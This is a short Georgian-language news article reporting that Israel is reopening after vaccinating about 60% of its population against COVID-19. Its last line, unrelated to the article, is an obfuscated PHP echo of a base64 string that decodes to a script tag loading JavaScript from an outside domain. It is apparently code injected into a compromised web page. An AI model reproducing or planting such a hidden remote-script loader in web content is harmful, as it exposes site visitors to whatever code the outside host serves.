celsiusi
ავერსი შნაიდერი
ისრაელი პირველი ქვეყანაა მსოფლიოში, რომელიც პანდემიის ფონზე ცხოვრების ჩვეულ რიტმს იბრუნებს.
 
ისრაელის დაახლოებით 9 მილიონიანი მოსახლეობის თითქმის 60% -მა მიიღო COVID-19 ვაქცინის მინიმუმ ერთი დოზა, რაც გახდა საფუძველი ქვეყანა თითქმის სრულად გახსნილიყო. 
 
ქვეყანა კორონავირუსის პანდემიის ფონზე ნელ-ნელა ცხოვრების ჩვეულ რიტმს უბრუნდება,  მაშინ, როცა მსოფლიოს არაერთი ქვეყანა კვლავაც ამკაცრებს შეზღუდვებს, იტალია წითელ ზონაშია და სხვა ევროპის ქვეყნები აპრილში მესამე ტალღის მოლოდინში , ისრაელმა უკვე თითქმის სრულად გახსნა რესტორნები, ბარები, კომერციული დასხვა დაწესებულებები.
ისრაელი მაგალითია დანარჩენი მსოფლიოსთვის,  თუ როგორ უნდა გადაარჩინოს საკუთარი სახელმწიფო, დაიცვას ადამიანების სიცოცხლე და ეკონომიკა. 
 
ისრაელი მსოფლიოს ლიდერ ქვეყნად იქცა პანდემიასთან ბრძოლის კუთხით, ვინაიდან  მასობრივი ვაქცინაცია ორგანიზებულად , შთამბეჭდავი ტემპით დაიწყო და ძირითადად, Pfizer-BioNTech-ს ვაქცინით პირველ ორ კვირაში მოსახლეობის 10%-ზე მეტი აცრა. 
 
2972
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");